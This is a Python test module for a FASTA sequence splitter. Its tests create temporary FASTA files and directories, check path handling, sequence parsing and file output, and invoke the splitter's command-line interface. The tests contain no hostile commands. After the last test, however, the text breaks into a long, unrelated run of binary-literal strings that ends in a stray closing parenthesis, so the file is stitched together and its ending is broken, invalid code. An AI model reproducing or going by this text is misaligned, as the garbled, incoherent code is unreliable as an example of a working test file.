def test_when_multiple_sequences_file_path_is_one_level_below_then_return_path_underscored_string():
multiple_sequences_file_one_level_below_path_parents_underscored_expected = "ParentBelow"
temporary_directory_one_level_below = Path("ParentBelow")
temporary_directory_one_level_below.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_below.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w"):
pass
mult_sequences_file_one_level_below_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_one_level_below_path_parents_underscored_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents_underscored(mult_sequences_file_one_level_below_path_parents_returned)
assert multiple_sequences_file_one_level_below_path_parents_underscored_returned \
== multiple_sequences_file_one_level_below_path_parents_underscored_expected
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_below.rmdir()
def test_when_multiple_sequences_file_path_is_one_level_above_then_return_path_underscored_string():
multiple_sequences_file_one_level_above_path_parents_underscored_expected = \
str(Path.cwd().parent).replace("/", "_").replace("\\", "_") \
.replace(".", "").replace(":", "_").replace("_", "", 1) + "_ParentAbove"
temporary_directory_one_level_above = Path.cwd().parent.joinpath("ParentAbove")
temporary_directory_one_level_above.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_above.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w"):
pass
mult_sequences_file_one_level_above_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_one_level_above_path_parents_underscored_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents_underscored(mult_sequences_file_one_level_above_path_parents_returned)
assert multiple_sequences_file_one_level_above_path_parents_underscored_returned \
== multiple_sequences_file_one_level_above_path_parents_underscored_expected
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_above.rmdir()
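The expected value assembled at the top of the one-level-above test encodes, as a chain of `replace` calls, the transformation these tests expect from `get_multiple_sequences_file_path_parents_underscored`. A sketch of that transformation as a standalone function (the name `underscore_path_parents` is hypothetical; the body is copied from the tests' own expectation, not from the library):

```python
def underscore_path_parents(path_parents_string):
    # Path separators become underscores, dots are dropped, drive-colon
    # markers become underscores, and the first underscore (produced by
    # an absolute path's leading separator) is removed.
    return (str(path_parents_string)
            .replace("/", "_")
            .replace("\\", "_")
            .replace(".", "")
            .replace(":", "_")
            .replace("_", "", 1))
```

For example, `underscore_path_parents("/home/user")` yields `"home_user"`, while a same-level parents string of `""` and a one-level-below string of `"ParentBelow"` pass through unchanged, matching the three expected values above.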
def test_when_multiple_sequences_file_is_valid_then_return_individual_sequences_name_list():
individual_sequences_name_list_expected = ["Sequence1", "Sequence2", "Sequence3"]
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
for index in range(len(individual_sequences_name_list_returned)):
assert individual_sequences_name_list_returned[index] == individual_sequences_name_list_expected[index]
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_is_valid_then_return_individual_sequences_data_list():
individual_sequences_data_list_expected = ["AAA", "CCC", "GGG"]
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
for index in range(len(individual_sequences_data_list_returned)):
assert individual_sequences_data_list_returned[index][1] == individual_sequences_data_list_expected[index]
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_is_valid_and_path_is_on_the_same_level_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
individual_sequences_files_written_count_expected = 3
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_same_level_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
individual_sequences_files_written_count_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files(multiple_sequences_file_same_level_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned,
individual_sequences_data_list_returned)
assert individual_sequences_files_written_count_returned == individual_sequences_files_written_count_expected
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_is_valid_and_path_is_one_level_below_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path.cwd().joinpath("ParentBelow").joinpath("Sequence1.fasta")
sequence2_file_expected = Path.cwd().joinpath("ParentBelow").joinpath("Sequence2.fasta")
sequence3_file_expected = Path.cwd().joinpath("ParentBelow").joinpath("Sequence3.fasta")
individual_sequences_files_written_count_expected = 3
temporary_directory_one_level_below = Path("ParentBelow")
temporary_directory_one_level_below.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_below.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_below_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
individual_sequences_files_written_count_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files(multiple_sequences_file_one_level_below_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned,
individual_sequences_data_list_returned)
assert individual_sequences_files_written_count_returned == individual_sequences_files_written_count_expected
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_below.rmdir()
def test_when_multiple_sequences_file_is_valid_and_path_is_one_level_above_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path.cwd().parent.joinpath("ParentAbove").joinpath("Sequence1.fasta")
sequence2_file_expected = Path.cwd().parent.joinpath("ParentAbove").joinpath("Sequence2.fasta")
sequence3_file_expected = Path.cwd().parent.joinpath("ParentAbove").joinpath("Sequence3.fasta")
individual_sequences_files_written_count_expected = 3
temporary_directory_one_level_above = Path.cwd().parent.joinpath("ParentAbove")
temporary_directory_one_level_above.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_above.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_above_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
individual_sequences_files_written_count_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files(multiple_sequences_file_one_level_above_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned,
individual_sequences_data_list_returned)
assert individual_sequences_files_written_count_returned == individual_sequences_files_written_count_expected
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_above.rmdir()
def test_when_multiple_sequences_file_path_is_on_the_same_level_then_write_sequences_path_list_file_to_disk():
individual_sequences_path_list_file_expected = Path("Sequences_Path_List.txt")
individual_sequences_files_path_list_file_path_expected = \
Path.cwd().joinpath(individual_sequences_path_list_file_expected)
individual_sequences_path_list_file_data_expected = ["Sequence1.fasta", "Sequence2.fasta", "Sequence3.fasta"]
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_same_level_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_files_path_list_file_path_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files_path_list(multiple_sequences_file_same_level_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned)
assert individual_sequences_files_path_list_file_path_returned \
== individual_sequences_files_path_list_file_path_expected
assert individual_sequences_path_list_file_expected.exists()
individual_sequences_path_list_file_data_returned = []
with open(individual_sequences_path_list_file_expected, mode="r") as individual_sequences_files_path_list_file:
for line in individual_sequences_files_path_list_file:
individual_sequences_path_list_file_data_returned.append(line.strip())
for index in range(len(individual_sequences_path_list_file_data_returned)):
assert individual_sequences_path_list_file_data_returned[index] \
== individual_sequences_path_list_file_data_expected[index]
individual_sequences_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_path_is_one_level_below_then_write_sequences_path_list_file_to_disk():
individual_sequences_path_list_file_expected = Path("ParentBelow_Sequences_Path_List.txt")
individual_sequences_files_path_list_file_path_expected = \
Path.cwd().joinpath(individual_sequences_path_list_file_expected)
temporary_directory_one_level_below = Path("ParentBelow")
temporary_directory_one_level_below.mkdir()
individual_sequences_path_list_file_data_expected = \
[str(temporary_directory_one_level_below.joinpath("Sequence1.fasta")),
str(temporary_directory_one_level_below.joinpath("Sequence2.fasta")),
str(temporary_directory_one_level_below.joinpath("Sequence3.fasta"))]
temporary_multiple_sequences_file = temporary_directory_one_level_below.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_below_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_files_path_list_file_path_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files_path_list(multiple_sequences_file_one_level_below_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned)
assert individual_sequences_files_path_list_file_path_returned \
== individual_sequences_files_path_list_file_path_expected
assert individual_sequences_path_list_file_expected.is_file()
individual_sequences_path_list_file_data_returned = []
with open(individual_sequences_path_list_file_expected, mode="r") as individual_sequences_files_path_list_file:
for line in individual_sequences_files_path_list_file:
individual_sequences_path_list_file_data_returned.append(line.strip())
for index in range(len(individual_sequences_path_list_file_data_returned)):
assert individual_sequences_path_list_file_data_returned[index] \
== individual_sequences_path_list_file_data_expected[index]
individual_sequences_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_below.rmdir()
def test_when_multiple_sequences_file_path_is_one_level_above_then_write_sequences_path_list_file_to_disk():
individual_sequences_path_list_file_expected = Path.cwd() \
.joinpath(str(Path.cwd().parent)
.replace("/", "_").replace("\\", "_").replace(".", "").replace(":", "_").replace("_", "", 1)
+ str(Path.cwd().suffix) + "_ParentAbove_Sequences_Path_List.txt")
individual_sequences_files_path_list_file_path_expected = \
Path.cwd().joinpath(individual_sequences_path_list_file_expected)
temporary_directory_one_level_above = Path.cwd().parent.joinpath("ParentAbove")
temporary_directory_one_level_above.mkdir()
individual_sequences_path_list_file_data_expected = \
[str(temporary_directory_one_level_above.joinpath("Sequence1.fasta")),
str(temporary_directory_one_level_above.joinpath("Sequence2.fasta")),
str(temporary_directory_one_level_above.joinpath("Sequence3.fasta"))]
temporary_multiple_sequences_file = temporary_directory_one_level_above.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_above_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_files_path_list_file_path_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files_path_list(multiple_sequences_file_one_level_above_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned)
assert individual_sequences_files_path_list_file_path_returned \
== individual_sequences_files_path_list_file_path_expected
assert individual_sequences_path_list_file_expected.is_file()
individual_sequences_path_list_file_data_returned = []
with open(individual_sequences_path_list_file_expected, mode="r") as individual_sequences_files_path_list_file:
for line in individual_sequences_files_path_list_file:
individual_sequences_path_list_file_data_returned.append(line.strip())
for index in range(len(individual_sequences_path_list_file_data_returned)):
assert individual_sequences_path_list_file_data_returned[index] \
== individual_sequences_path_list_file_data_expected[index]
individual_sequences_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_above.rmdir()
def test_when_execute_split_command_without_sequences_file_path_argument_then_return_exit_error_code_one():
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group, ["split", ""])
assert result.return_value is None
assert result.exit_code == 1
assert result.exc_info[0] == FileNotFoundError
assert str(result.exception) == "FASTA multiple sequences file not found!"
def test_when_execute_split_command_with_just_sequences_file_path_then_return_successful_exit_code_zero():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group,
["split", str(temporary_multiple_sequences_file)])
assert result.return_value is None
assert result.exit_code == 0
assert result.exc_info[0] == SystemExit
assert result.exception is None
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_execute_split_command_with_sequences_file_and_generate_list_paths_then_return_successful_exit_code_zero():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
individual_sequences_files_path_list_file_expected = Path("Sequences_Path_List.txt")
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group,
["split", str(temporary_multiple_sequences_file), "--generate-path-list"])
assert result.return_value is None
assert result.exit_code == 0
assert result.exc_info[0] == SystemExit
assert result.exception is None
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
individual_sequences_files_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_execute_split_command_with_sequences_file_path_and_verbose_then_return_successful_exit_code_zero():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
temporary_multiple_sequences_file = Path("sequences.fasta")
split_details_message_expected = "Multiple sequences file (source): {0}\n" \
"Number of individual sequences read from source: {1}\n" \
"Number of individual sequences files written to disk: {2}\n" \
"Location of individual sequences files: {3}\n" \
"Individual sequences files path list file: {4}" \
.format(str(Path.cwd().joinpath(temporary_multiple_sequences_file)), "3", "3", str(Path.cwd()), "None\n")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group,
["split", str(temporary_multiple_sequences_file), "--verbose"])
assert result.return_value is None
assert result.exit_code == 0
assert result.exc_info[0] == SystemExit
assert result.exception is None
assert result.output == split_details_message_expected
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_execute_main_function_without_sequences_file_path_argument_then_throws_file_not_found_exception():
sys.argv = ["", ""]
with pytest.raises(FileNotFoundError) as pytest_wrapped_e:
runpy.run_path("fastasplitter_splitter/splitter.py", run_name="__main__")
assert pytest_wrapped_e.type == FileNotFoundError
assert str(pytest_wrapped_e.value) == "FASTA multiple sequences file not found!"
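Most tests in this module write `sequences.fasta` into the working directory and clean up manually with `unlink()`, which leaves stray files behind whenever an assertion fails before the cleanup line runs. A sketch of the same setup using pytest's built-in `tmp_path` fixture, which gives each test an isolated directory that pytest removes automatically (the helper and test names here are illustrations, not part of the original suite):

```python
from pathlib import Path


def write_multiple_sequences_fasta(directory: Path) -> Path:
    # Write the three-sequence payload used throughout this module and
    # return the resulting file path.
    fasta_path = directory / "sequences.fasta"
    with open(fasta_path, mode="w") as multiple_sequences_file:
        multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
        multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
        multiple_sequences_file.write(">Sequence3\nGGG\n")
    return fasta_path


def test_fixture_based_setup_sketch(tmp_path):
    # tmp_path is a fresh per-test directory; no unlink()/rmdir() needed,
    # even when an assertion fails mid-test.
    temporary_multiple_sequences_file = write_multiple_sequences_fasta(tmp_path)
    assert temporary_multiple_sequences_file.is_file()
```

The path-parents tests that deliberately exercise same-level, one-level-below, and one-level-above layouts would still need real relative paths, but every test that only needs *a* FASTA file could share this fixture-based setup.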
'0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b10', '0b1', '0b1', '0b1000', '0b1010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b101', '0b1010101', '0b1000000', '0b0', '0b1010000', '0b100000', '0b0', '0b1', '0b10', '0b1', '0b1', '0b1', '0b1000', '0b1', '0b1010', '0b1010', '0b1000', '0b1000', '0b0', '0b0', '0b0', '0b10', '0b10100', '0b10', '0b1', '0b1', '0b0', '0b1000', '0b100010', '0b1010', '0b1', '0b10000', '0b10000', '0b10000010', '0b1', '0b1', '0b10100010', '0b10000', '0b1', '0b10001', '0b10000', '0b101000', '0b10001', '0b1000000', '0b1000000', '0b1010000', '0b100', '0b10001', '0b1', '0b1010000', '0b1000000', '0b101010', '0b1', '0b1000000', '0b1010000', '0b10000', '0b10001', '0b10001', '0b10001', '0b1000001', '0b100', '0b101', '0b1', '0b1', '0b100', '0b100', '0b101', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1', '0b10001000', '0b10001010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b1', '0b10101000', '0b10101010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', 
'0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010000', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010000', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010101', '0b1000000', '0b0', '0b101', '0b10', '0b0', '0b1', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b10', '0b1', '0b1', '0b1000', '0b1010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b101', '0b1010101', '0b1000000', '0b0', '0b1010000', '0b100010', '0b0', '0b1', '0b10', '0b1', '0b1000', '0b1000', '0b1', '0b1000', '0b1', '0b1010', '0b1000', '0b1000', '0b0', '0b10', '0b1', '0b10001', '0b0', '0b10', '0b1', '0b1', '0b100010', '0b1000', '0b1010', '0b10000', '0b10000', '0b1', '0b1', '0b10000010', '0b10100010', '0b1', '0b10000', '0b10000', '0b1', '0b10001', '0b10001', '0b1000000', '0b100', '0b101000', '0b1', '0b1000000', '0b1010000', '0b1010000', '0b1000000', '0b100', '0b10001', '0b10001', '0b1', '0b1010000', '0b101010', '0b10001', '0b10001', '0b1000000', '0b101', '0b1', '0b10000', '0b10000', '0b1010000', '0b10000', '0b1010000', '0b1', '0b100', '0b100', '0b101', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1', '0b10001000', '0b10001010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b1', '0b10101000', '0b10101010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', 
'0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010101', '0b1000101', '0b0', '0b100', '0b1', '0b10', '0b0', '0b1', '0b100010', '0b1', '0b100010', '0b0', '0b10101', '0b0', '0b1010100', '0b1010101', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', 
'0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b101', '0b1010101', '0b1000100')
